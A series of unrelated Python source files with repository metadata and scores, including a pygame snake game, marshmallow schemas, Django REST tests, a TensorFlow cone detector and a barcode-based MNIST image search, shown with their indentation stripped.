macaX = (randint(0,19)*30)+1
while((macaX in listaXCorpo) and (macaY in listaYCorpo)):
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
macaFunc(macaX, macaY)
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1
    # Variable to check whether the snake should grow or not
crescer = False
pygame.time.wait(1000)
# Game Loop
running = True
while running:
        # Setting the input list
listaEntrada[0] = rodada
listaEntrada[1] = pontos
#listaEntrada[2] = matriz_do_tabuleiro
#listaEntrada[2] = (macaX-1)/30
#listaEntrada[3] = (macaY-1)/30
#listaEntrada[4] = (cabecaX-1)/30
#listaEntrada[5] = (cabecaY-1)/30
        # Get the events
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
            # If an arrow key is pressed
if event.type == pygame.KEYDOWN:
rodada += 1
if not fim_de_jogo and rodada > 1:
                    # Note: does not change direction if already moving in the desired one
if (event.key == pygame.K_LEFT) and (cabecaXChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_esquerda.png")
cabecaXChange = -30
cabecaYChange = 0
if (event.key == pygame.K_RIGHT) and (cabecaXChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_direita.png")
cabecaXChange = 30
cabecaYChange = 0
if (event.key == pygame.K_DOWN) and (cabecaYChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_baixo.png")
cabecaXChange = 0
cabecaYChange = 30
if (event.key == pygame.K_UP) and (cabecaYChange == 0):
imagemCabeca = pygame.image.load("images/cabeça_cima.png")
cabecaXChange = 0
cabecaYChange = -30
if rodada>0:
            # If the apple is caught, add 1 point and create a new one
            # Update the apple position in the matrix
if (cabecaX == macaX and cabecaY == macaY):
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 0
pontos += 1
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
matriz_do_tabuleiro[(macaY-1)//30][(macaX-1)//30] = 1
                # Make sure the apple does not appear on top of the snake
while((macaX in listaXCorpo) and (macaY in listaYCorpo)):
macaY = (randint(0,19)*30)+1
macaX = (randint(0,19)*30)+1
macaFunc(macaX, macaY)
                # Keep the flag so the snake grows
crescer = True
            # Place a body segment right where the head leaves and
            # record it in the list
listaXCorpo.append(cabecaX)
listaYCorpo.append(cabecaY)
matriz_do_tabuleiro[(cabecaY-1)//30][(cabecaX-1)//30] = -1
corpoFunc(cabecaX, cabecaY)
cabecaX += cabecaXChange
cabecaY += cabecaYChange
            # Condition for the snake hitting the border
if (cabecaX < 0) or (cabecaX > 600) or (cabecaY > 600) or (cabecaY < 0):
                # Draw the scoreboard
placarFunc(210,270)
cabecaXChange = 0
cabecaYChange = 0
fim_de_jogo = True
            # Condition for the snake hitting itself
for i in range(len(listaXCorpo)):
if(cabecaX == listaXCorpo[i]):
if (cabecaY == listaYCorpo[i]):
                        # Draw the scoreboard
placarFunc(210,270)
cabecaXChange = 0
cabecaYChange = 0
fim_de_jogo = True
            # Cover the tip of the tail with a green background square
            # If crescer == True, make the snake grow by 1 space
if not crescer:
matriz_do_tabuleiro[(listaYCorpo[0]-1)//30][(listaXCorpo[0]-1)//30] = 0
quadradoFundoFunc(listaXCorpo.pop(0), listaYCorpo.pop(0))
crescer = False
            # Place the head on the next space
cabecaFunc(cabecaX, cabecaY)
            # Update the screen and add a delay
pygame.display.update()
pygame.time.wait(150)
| 3.5 | 4 |
retailstore/serializers/schemas.py | code-R/retail_app | 2 | 12799094 | <filename>retailstore/serializers/schemas.py<gh_stars>1-10
from marshmallow import fields, Schema
class BaseSchema(Schema):
id = fields.Integer()
name = fields.String(required=True)
description = fields.String()
created_at = fields.DateTime(attribute="created_at")
class LocationSchema(BaseSchema):
def hiera_data(self, location):
res = {
'name': location.name,
'children': []
}
departments = location.departments
department_schema = DepartmentSchema()
for department in departments:
res['children'].append(
department_schema.hiera_data(department))
return res
class DepartmentSchema(BaseSchema):
location_id = fields.Integer()
def hiera_data(self, department):
res = {
'name': department.name,
'children': []
}
categories = department.categories
category_schema = CategorySchema()
for category in categories:
res['children'].append(
category_schema.hiera_data(category))
return res
class CategorySchema(BaseSchema):
department_id = fields.Integer()
def hiera_data(self, category):
res = {
'name': category.name,
'children': []
}
sub_categories = category.sub_categories
for sub_category in sub_categories:
res['children'].append({
"name": sub_category.name
})
return res
class SubCategorySchema(BaseSchema):
category_id = fields.Integer()
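# Illustrative usage (added; assumes calling code similar to the API resources, and
# that `location` is a model instance with its departments/categories loaded; note
# marshmallow 2 returns a MarshalResult from dump(), marshmallow 3 a plain dict):
#   schema = LocationSchema()
#   flat = schema.dump(location)        # id, name, description, created_at
#   tree = schema.hiera_data(location)  # nested {'name': ..., 'children': [...]} tree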
| 2.5625 | 3 |
flare/forms/formerrors.py | xnopasaranx/flare | 0 | 12799095 | from typing import List, Tuple
#from flare.forms.bones.base import ReadFromClientErrorSeverity
from flare.icons import SvgIcon
from flare.i18n import translate
from flare import html5
def collectBoneErrors(errorList, currentKey,boneStructure):
'''
severity:
NotSet = 0
InvalidatesOther = 1
Empty = 2
Invalid = 3
'''
boneErrors = []
for error in errorList or []:
if error["fieldPath"] and error["fieldPath"][0] == currentKey:
isError = False
if (error["severity"] == 0 or error["severity"] == 2) and boneStructure["required"]:
isError = True
elif error["severity"] ==3:
isError = True
# ToDO Field dependency!
if isError:
thisError = error.copy()
thisError["fieldPath"] = error["fieldPath"][1:]
boneErrors.append(thisError)
return boneErrors
class ToolTipError(html5.Div):
"""
Small utility class for providing tooltips
"""
def __init__(self, shortText="", longText="", *args, **kwargs):
super( ToolTipError, self ).__init__( *args, **kwargs )
self["class"] = "vi-tooltip msg msg--error is-active is-open"
self.sinkEvent("onClick")
self.prependChild( SvgIcon( "icon-arrow-right", title = shortText ) )
#language=HTMl
self.fromHTML("""
<div class="msg-content" [name]="tooltipMsg">
<h2 class="msg-headline" [name]="tooltipHeadline"></h2>
<div class="msg-descr" [name]="tooltipDescr"></div>
</div>
""")
self.tooltipHeadline.element.innerHTML = translate("vi.tooltip.error")
self.tooltipDescr.element.innerHTML = longText.replace( "\n", "<br />" )
def onClick(self, event):
self.toggleClass("is-open")
def _setDisabled(self, disabled):
return
def _getDisabled(self):
return False
#Not used
def buildBoneErrors(errorList):
boneErrors = {}
for error in errorList:
thisError = error.copy()
thisError[ "fieldPath" ] = error[ "fieldPath" ][ 1: ]
if error[ "fieldPath" ] and error[ "fieldPath" ][ 0 ] not in boneErrors:
boneErrors.update({error[ "fieldPath" ][ 1 ]:[thisError]})
else:
boneErrors[error[ "fieldPath" ][ 1 ]].append(thisError)
return boneErrors
def checkErrors(bone) -> Tuple[bool, List[str]]:
'''
first return value is a shortcut to test if bone is valid or not
second returns a list of fields which are invalid through this bone
'''
errors = bone["errors"]
#no errors for this bone
if not errors:
return False, list()
invalidatedFields = list()
isInvalid = True
for error in errors:
if (
(error["severity"] == ReadFromClientErrorSeverity.Empty and bone["required"]) or
(error["severity"] == ReadFromClientErrorSeverity.InvalidatesOther)
):
if error["invalidatedFields"]:
invalidatedFields.extend(error["invalidatedFields"])
# We found only warnings
if not invalidatedFields:
return False, list()
return isInvalid, invalidatedFields
| 2.109375 | 2 |
nacelle/contrib/mail/utils.py | paddycarey/nacelle | 0 | 12799096 | <filename>nacelle/contrib/mail/utils.py<gh_stars>0
"""Utilities used to render and send emails
"""
# marty mcfly imports
from __future__ import absolute_import
# third-party imports
from nacelle.core.template.renderers import render_jinja2_template
def render_email(template, context=None):
"""Uses Jinja2 to render the email
"""
if context is None:
context = {}
email_body = render_jinja2_template(template, context)
return email_body
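# Illustrative usage (added; the template path and context keys are hypothetical):
#   body = render_email('emails/welcome.html', {'name': 'Ada'})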
| 1.5 | 2 |
test_scripts/ssd_on_video.py | ajinkyakhoche/Object-Detection-Project | 0 | 12799097 | import cv2
import numpy as np
import tensorflow as tflow
from utils import label_map_util
#from ConeDetection import *
from cone_img_processing2 import *
import os
# Set threshold for detection of cone for object detector
threshold_cone = 0.5
#Set path to check point and label map
#PATH_TO_CKPT = './frozen_orange_net.pb'
PATH_TO_CKPT = './frozen_weights/frozen_cone_graph_modified.pb'
#PATH_TO_CKPT = './frozen_weights/mobilenet_v2_0.75_224_frozen.pb'
PATH_TO_LABELS = './test_scripts/label_map.pbtxt'
# Define no. of classes
NUM_CLASSES = 1 #only one class, i.e. cone
## Load a (frozen) Tensorflow model into memory.
detection_graph = tflow.Graph()
with detection_graph.as_default():
od_graph_def = tflow.GraphDef()
with tflow.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tflow.import_graph_def(od_graph_def, name='')
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
gpu_options = tflow.GPUOptions(per_process_gpu_memory_fraction=0.4)
#config=tflow.ConfigProto(gpu_options=gpu_options)
def mainLoop():
# Try the following videos:
# 20180619_175221224 # shade to brightness
# 20180619_180755490 # towards sun
# 20180619_180515860 # away from sun
cap = cv2.VideoCapture('./test_videos/20180619_175221224.mp4')
#cap = cv2.VideoCapture('./test_videos/Formula Student Spain 2015 Endurance- DHBW Engineering with the eSleek15.mp4')
frameCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
count = 0
img_number = 1000
with detection_graph.as_default():
#with tflow.Session(graph=detection_graph) as sess:
with tflow.Session(graph=detection_graph, config=tflow.ConfigProto(gpu_options=gpu_options)) as sess:
while count < frameCount:
ret, image_np = cap.read()
if ret == True:
count = count + 1
# image_np = cv2.resize(processFrame.image, (0,0), fx=0.5, fy=0.5)
#image_np = processFrame.image
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
# Definition of boxes [ymin, xmin, ymax, xmax]
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
width = image_np.shape[1]
height = image_np.shape[0]
# width, height = cv2.GetSize(image_np)
output_img = image_np.copy()
for i in range(boxes.shape[0]):
if np.all(boxes[i] == 0) or scores[i] < threshold_cone:
continue
b = boxes[i]
box_width = np.abs(float(b[3])-float(b[1]))
box_height = np.abs(float(b[2])-float(b[0]))
x = int(b[1] * width)
y = int(b[0] * height)
h = int(box_height * height)
w = int(box_width * width)
candidate = image_np[y:y+h, x:x+w]
# if count % (2*fps) == 0:
# # Save the image (optional)
# cv2.imwrite('./test_videos/cone_samples/' + str(img_number) + '.jpg', candidate)
# img_number = img_number + 1
y = y + 1
z = 0
result = detectCone1(candidate)
# print(result)
if result == 0:
print("Yellow Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0, 255, 255), 7)
cv2.putText(output_img, 'yellow cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
if result == 1:
print("Blue Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (255, 0, 0), 7)
cv2.putText(output_img, 'blue cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
if result == 2:
print("Orange Cone")
cv2.rectangle(output_img, (int(b[1] * width),int(b[0] * height)), (x+w,y+h), (0,165,255), 7)
cv2.putText(output_img, 'orange cone', (int(b[1] * width),int(b[0] * height)-30), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.putText(output_img, str(round(z,1))+" m", (int(b[1] * width),int(b[0] * height)-5), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 0, 0), 2, cv2.LINE_AA)
cv2.imshow('object detection', cv2.resize(output_img, (image_np.shape[1],image_np.shape[0])))
cv2.waitKey(1)
cv2.destroyAllWindows()
if __name__ == '__main__':
mainLoop()
| 2.421875 | 2 |
kubernetes/test/test_v2beta2_metric_spec.py | mariusgheorghies/python | 0 | 12799098 | <gh_stars>0
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.v2beta2_metric_spec import V2beta2MetricSpec # noqa: E501
from kubernetes.client.rest import ApiException
class TestV2beta2MetricSpec(unittest.TestCase):
"""V2beta2MetricSpec unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test V2beta2MetricSpec
        include_optional is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.v2beta2_metric_spec.V2beta2MetricSpec() # noqa: E501
if include_optional :
return V2beta2MetricSpec(
container_resource = kubernetes.client.models.v2beta2/container_resource_metric_source.v2beta2.ContainerResourceMetricSource(
container = '0',
name = '0',
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
external = kubernetes.client.models.v2beta2/external_metric_source.v2beta2.ExternalMetricSource(
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
object = kubernetes.client.models.v2beta2/object_metric_source.v2beta2.ObjectMetricSource(
described_object = kubernetes.client.models.v2beta2/cross_version_object_reference.v2beta2.CrossVersionObjectReference(
api_version = '0',
kind = '0',
name = '0', ),
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
pods = kubernetes.client.models.v2beta2/pods_metric_source.v2beta2.PodsMetricSource(
metric = kubernetes.client.models.v2beta2/metric_identifier.v2beta2.MetricIdentifier(
name = '0',
selector = kubernetes.client.models.v1/label_selector.v1.LabelSelector(
match_expressions = [
kubernetes.client.models.v1/label_selector_requirement.v1.LabelSelectorRequirement(
key = '0',
operator = '0',
values = [
'0'
], )
],
match_labels = {
'key' : '0'
}, ), ),
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
resource = kubernetes.client.models.v2beta2/resource_metric_source.v2beta2.ResourceMetricSource(
name = '0',
target = kubernetes.client.models.v2beta2/metric_target.v2beta2.MetricTarget(
average_utilization = 56,
average_value = '0',
type = '0',
value = '0', ), ),
type = '0'
)
else :
return V2beta2MetricSpec(
type = '0',
)
def testV2beta2MetricSpec(self):
"""Test V2beta2MetricSpec"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 1.984375 | 2 |
api_products/tests.py | arunjohn96/Abacies | 0 | 12799099 | from rest_framework.test import APITestCase
from django.shortcuts import reverse
from rest_framework import status
from core.models import ProductsTbl, PurchaseTransactionTbl
# Create your tests here.
class TestProductViews(APITestCase):
def setUp(self):
self.product_url = reverse('products-list')
self.product_data = {
'product_id': 10215,
'name': '<NAME>',
'quantity': 105,
'unit_price': 100.00
}
def test_cannot_create_products(self):
res = self.client.post(self.product_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_product(self):
res = self.client.post(self.product_url, self.product_data)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(res.data['product_id'],
self.product_data['product_id'])
self.assertEqual(res.data['name'], self.product_data['name'])
self.assertEqual(res.data['quantity'], self.product_data['quantity'])
class TestPurchaseViews(APITestCase):
def setUp(self):
self.purchase_url = reverse('purchases-list')
self.purchase_data = {
'product_id': 10215,
'purchase_id': '8d7qdouiabnsdodAY9DQJp09',
'purchased_quantity': 90,
}
self.product = ProductsTbl.objects.create(
product_id=10216,
name='<NAME>',
quantity=100,
unit_price=100.00
)
self.purchase = PurchaseTransactionTbl.objects.create(
product=self.product,
purchase_id='d6asd65asd654as5d4',
purchased_quantity=75
)
self.purchase_detail_url = reverse(
'purchases-detail', kwargs={'pk': self.purchase.pk})
def test_cannot_create_purchase(self):
res = self.client.post(self.purchase_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_create_purchase_wrong_data(self):
res = self.client.post(self.purchase_url, self.purchase_data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_purchase_with_data(self):
product = ProductsTbl.objects.create(
product_id=10215,
name='<NAME>',
quantity=105,
unit_price=100.00
)
qty = product.quantity
res = self.client.post(self.purchase_url, self.purchase_data)
new_qty = ProductsTbl.objects.get(
product_id=res.data['product_id']).quantity
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
self.assertEqual(res.data['product_id'],
self.purchase_data['product_id'])
self.assertEqual(res.data['purchase_id'],
self.purchase_data['purchase_id'])
self.assertEqual(res.data['purchased_quantity'],
self.purchase_data['purchased_quantity'])
self.assertEqual(
new_qty, (qty - self.purchase_data['purchased_quantity']))
def test_cannot_update_purchase(self):
res = self.client.put(self.purchase_detail_url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_update_purchase(self):
data = {'purchased_quantity': 50}
qty = self.product.quantity
old_qty = self.purchase.purchased_quantity
new_qty = data['purchased_quantity']
qty = qty - (new_qty - old_qty)
res = self.client.put(self.purchase_detail_url, data)
check_qty = ProductsTbl.objects.get(id=self.product.pk).quantity
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data['purchased_quantity'],
data['purchased_quantity'])
self.assertEqual(qty, check_qty)
def test_cannot_delete_purchase(self):
res = self.client.delete(
reverse('purchases-detail', kwargs={'pk': 100}))
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_purchase(self):
qty = self.product.quantity
purchase_quantity = self.purchase.purchased_quantity
res = self.client.delete(self.purchase_detail_url)
new_qty = ProductsTbl.objects.get(id=self.product.id).quantity
self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(new_qty, (qty + purchase_quantity))
class TestRefillView(APITestCase):
def setUp(self):
self.product = ProductsTbl.objects.create(
product_id=10001,
name='<NAME>',
quantity=100,
unit_price=2500
)
self.url = reverse('refill-list')
def test_cannot_refill(self):
res = self.client.post(self.url)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_cannot_refill_wrong_data(self):
data = {
'product_id':1000,
'refill_count':100,
}
res = self.client.post(self.url, data)
self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
def test_refill(self):
data ={
'product_id':self.product.product_id,
'refill_count':1000
}
quantity = self.product.quantity
new_qty = quantity+data['refill_count']
res = self.client.post(self.url,data)
check_qty = ProductsTbl.objects.get(id=self.product.pk).quantity
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(check_qty,new_qty)
| 2.515625 | 3 |
search_similar_image.py | airwick989/Content-Based-Image-Retrieval | 1 | 12799100 | import cv2
from PIL import Image
import numpy as np
import constants
import os
import math
import matplotlib.pyplot as plt
import time
def hammingDistance(v1, v2):
t = 0
for i in range(len(v1)):
if v1[i] != v2[i]:
t += 1
return t
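# Illustrative example (added): hammingDistance([0, 1, 1, 0], [1, 1, 0, 0]) == 2,
# since the vectors differ at indices 0 and 2.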
# read thresholds from thresholds.txt and then store them into thresholds list
thresholds = []
with open('./thresholds.txt', 'r') as f:
threshold = f.readline()
while threshold:
threshold = threshold.rstrip("\n")
thresholds.append(float(threshold))
threshold = f.readline()
f.close()
# read barcode and image location from barcodes.txt file
imageLocations = []
barcodes = []
with open("barcodes.txt", 'r') as f:
line = f.readline()
while line:
line = line.rstrip("\n")
line = line.split(",")
imageLocation = line.pop()
barcode = []
for bit in line:
barcode.append(int(bit))
imageLocations.append(imageLocation)
barcodes.append(barcode)
line = f.readline()
f.close()
def create_barcode(imagePath):
barcode = []
opcv = cv2.imread(imagePath, 0) # read image file as cv2 image
# ret2, th2 = cv2.threshold(opcv, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU) # apply threshold it just makes pixel values either black or white
img = Image.fromarray(opcv) # create image from thresholded 2d image array
barcode = []
degree = constants.MIN_DEGREE
while degree < constants.MAX_DEGREE: # loop through MIN_DEGREE to MAX_DEGREE by STEP_DEGREE
currentProjectionThreshold = int(degree / constants.STEP_DEGREE) # find the appropriate threshold index
rotated_image = img.rotate(degree) # rotate the image
image2d = np.array(rotated_image) # get 2d representation of the rotated image
for row in image2d: # loop through each row in thresholded image
row_sum = 0 # initialize row pixel counter
for pixel in row: # loop through each pixel in the row
pixel = pixel / 255 # since we have either 0 or 255 as a pixel value divide this number by 255 to get 0 or 1 which is there is pixel or there is not
row_sum+=pixel # sum of pixels across a single row
# thresholds the sum of the row to 1 or 0 based on calculated threshold
if row_sum >= thresholds[currentProjectionThreshold]:
barcode.append(1)
else:
barcode.append(0)
degree += constants.STEP_DEGREE
return barcode
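# Note (added; exact values depend on constants.py, which is not shown here):
# each projection angle contributes one bit per image row, so a barcode holds
# roughly constants.NUM_PROJECTIONS * constants.IMAGE_SIZE bits -- the same
# product used below as the upper bound on the Hamming distance.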
class CalculateAccuracyHitRatio:
def __init__(self, barcodes, imageLocations):
self.barcodes = barcodes
self.imageLocations = imageLocations
def calculateAccuracy(self):
accuracy = lambda x : x / 100
successCount = 0
for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1
directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path
for imageName in os.listdir(directory): # loop thorugh every file in the directory
print("Checking image {}".format(os.path.join(directory, imageName)))
searchBarcode = create_barcode(os.path.join(directory, imageName))
s, hd, resultImgLoc, resultImgBarcode = self.checkSuccess(searchBarcode, currDigit)
print("\tHamming Distance: {}\n\tResult Image: {}".format(hd, resultImgLoc))
# time.sleep(0.5/4)
if s:
successCount += 1
hitRatio = accuracy(successCount)
return hitRatio
def checkSuccess(self, searchBarcode, searchDigitGroup):
success = False # variable for holding the success information
        minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1 # Minimum Hamming Distance. It is (maximum hamming distance + 1) by default
minBarcode = None # barcode that corresponds to the minimum hamming distance
imageLoc = None # result image location
for i, barcode in enumerate(self.barcodes): # loop through every barcode in the barcodes list
currentHMD = hammingDistance( barcode, searchBarcode) # check each bit in both barcodes and calculate how many of these not same
if currentHMD == 0: # hamming distance 0 means the barcodes are identical which means they are the same image
continue # skip
elif currentHMD < minHMD: # if the current calculated hamming distance is less than the minimum hamming distance
minHMD = currentHMD # then set minimum hamming distance to current calculated hamming distance
minBarcode = barcode # set the current barcode as
imageLoc = self.imageLocations[i]
resultDigitGroup = imageLoc.split("_", 1)[0]
if int(resultDigitGroup) == int(searchDigitGroup):
success = True
return success, minHMD, imageLoc, minBarcode
class SearchSimilar:
def __init__(self):
self.digitSelectMenu()
def findSimilar(self, inputBarcode):
minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1
print(minHMD)
minBarcode = None
imageLoc = None
for i, barcode in enumerate(barcodes):
print(imageLocations[i])
currentHMD = hammingDistance( barcode, inputBarcode)
print(currentHMD)
if currentHMD == 0:
continue
elif currentHMD < minHMD:
minHMD = currentHMD
minBarcode = barcode
imageLoc = imageLocations[i]
return minHMD, minBarcode, imageLoc
def digitSelectMenu(self):
digitFolder = int(input("enter a digit (0 - 9): "))
while digitFolder >= 0 and digitFolder <= 9:
directory = r'.\MNIST_DS\{}'.format(digitFolder)
for c, imageName in enumerate(os.listdir(directory)):
print(c , " - ", imageName)
selectImage = int(input("select image from above list: "))
selectedImagePath = os.path.join(directory, os.listdir(directory)[selectImage])
print(selectedImagePath)
selectedImageBarcode = create_barcode(selectedImagePath)
minHMD = (constants.IMAGE_SIZE*constants.NUM_PROJECTIONS)+1
print(minHMD)
minBarcode = None
imageLoc = None
for i, barcode in enumerate(barcodes):
print(imageLocations[i])
currentHMD = hammingDistance( barcode,selectedImageBarcode)
print(currentHMD)
if currentHMD == 0:
continue
elif currentHMD < minHMD:
minHMD = currentHMD
minBarcode = barcode
imageLoc = imageLocations[i]
print("Result:")
print("\tHD: {}".format(minHMD))
print("\tImage Location: {}".format(imageLoc))
print("\tBarcode: {}".format(minBarcode))
fig = plt.figure(figsize=(10, 7))
fig.suptitle("Hamming Distance: {}".format(minHMD))
rows, columns = 2, 2
selectedImage = cv2.imread(selectedImagePath)
resultImageRelativePath = imageLoc.split("_", 1)
resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1]))
resultImage = cv2.imread(resultImagePath)
from create_barcode_image import BarcodeImageGenerator as big
big.generate_barcode_image(selectedImageBarcode, r".\temp\searchImage.png")
big.generate_barcode_image(minBarcode, r".\temp\resultImage.png")
searchBarcodeImage = cv2.imread(r".\temp\searchImage.png")
resultBarcodeImage = cv2.imread(r".\temp\resultImage.png")
fig.add_subplot(rows, columns, 1)
plt.imshow(selectedImage)
plt.axis("off")
plt.title("Search Image")
fig.add_subplot(rows, columns, 2)
plt.imshow(resultImage)
plt.axis("off")
plt.title("Result Image")
fig.add_subplot(rows, columns, 3)
plt.imshow(searchBarcodeImage)
plt.axis("off")
plt.title("Search Barcode")
fig.add_subplot(rows, columns, 4)
plt.imshow(resultBarcodeImage)
plt.axis("off")
plt.title("Result Barcode")
plt.show()
digitFolder = int(input("enter a digit (0 - 9): "))
def showAllResults(self):
fig = plt.figure(figsize=(16,100), dpi=100)
rows, cols = constants.NUMBER_OF_DIGITS*constants.NUMBER_IMAGES, 2
for currDigit in range(constants.NUMBER_OF_DIGITS): # loop through 0 to NUMBER_OF_DIGITS-1
directory = r'./MNIST_DS/{}'.format(currDigit) # digit folder path
for i, imageName in zip((i for i in range(1, 20, 2)), os.listdir(directory)): # loop thorugh every file in the directory
selectedImagePath = os.path.join(directory, imageName)
print("Checking image {}".format(os.path.join(directory, imageName)))
searchBarcode = create_barcode(os.path.join(directory, imageName))
hmd, resultBarcode, resultImgLoc = self.findSimilar(searchBarcode)
selectedImage = cv2.imread(selectedImagePath)
resultImageRelativePath = resultImgLoc.split("_", 1)
resultImagePath = os.path.join(r".\MNIST_DS", r"{}\{}".format(resultImageRelativePath[0], resultImageRelativePath[1]))
resultImage = cv2.imread(resultImagePath)
sii = currDigit*20+i
fig.add_subplot(rows, cols, sii)
plt.imshow(selectedImage)
plt.axis("off")
plt.title(selectedImagePath, fontsize=9, y=0.90)
fig.add_subplot(rows, cols, sii+1)
plt.imshow(resultImage)
plt.axis("off")
plt.title(resultImagePath, fontsize=9, y=0.90)
return fig
import matplotlib
# Make sure that we are using QT5
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from PyQt5 import QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
class ScrollableWindow(QtWidgets.QMainWindow):
def __init__(self, fig):
self.qapp = QtWidgets.QApplication([])
QtWidgets.QMainWindow.__init__(self)
self.widget = QtWidgets.QWidget()
self.setCentralWidget(self.widget)
self.widget.setLayout(QtWidgets.QVBoxLayout())
self.widget.layout().setContentsMargins(0,0,0,0)
self.widget.layout().setSpacing(0)
self.fig = fig
self.canvas = FigureCanvas(self.fig)
self.canvas.draw()
self.scroll = QtWidgets.QScrollArea(self.widget)
self.scroll.setWidget(self.canvas)
self.nav = NavigationToolbar(self.canvas, self.widget)
self.widget.layout().addWidget(self.nav)
self.widget.layout().addWidget(self.scroll)
self.show()
exit(self.qapp.exec_())
if __name__ == "__main__":
print("Search Menu")
print("Calculate Accuracy Hit Ratio")
print("Show All Results at Once")
input("Yes I have read the above notes. Press Enter to continue...")
print("\n\n\nEnter a number between 0 and 9 to search image")
print("Enter a number smaller than 0 or greater than 9 to exit the search menu")
print("Once you exit Search Menu you will get Calculate Accuracy Hit Ratio ")
input("Yes I have read the above notes. Press Enter to continue...")
si = SearchSimilar() # search menu
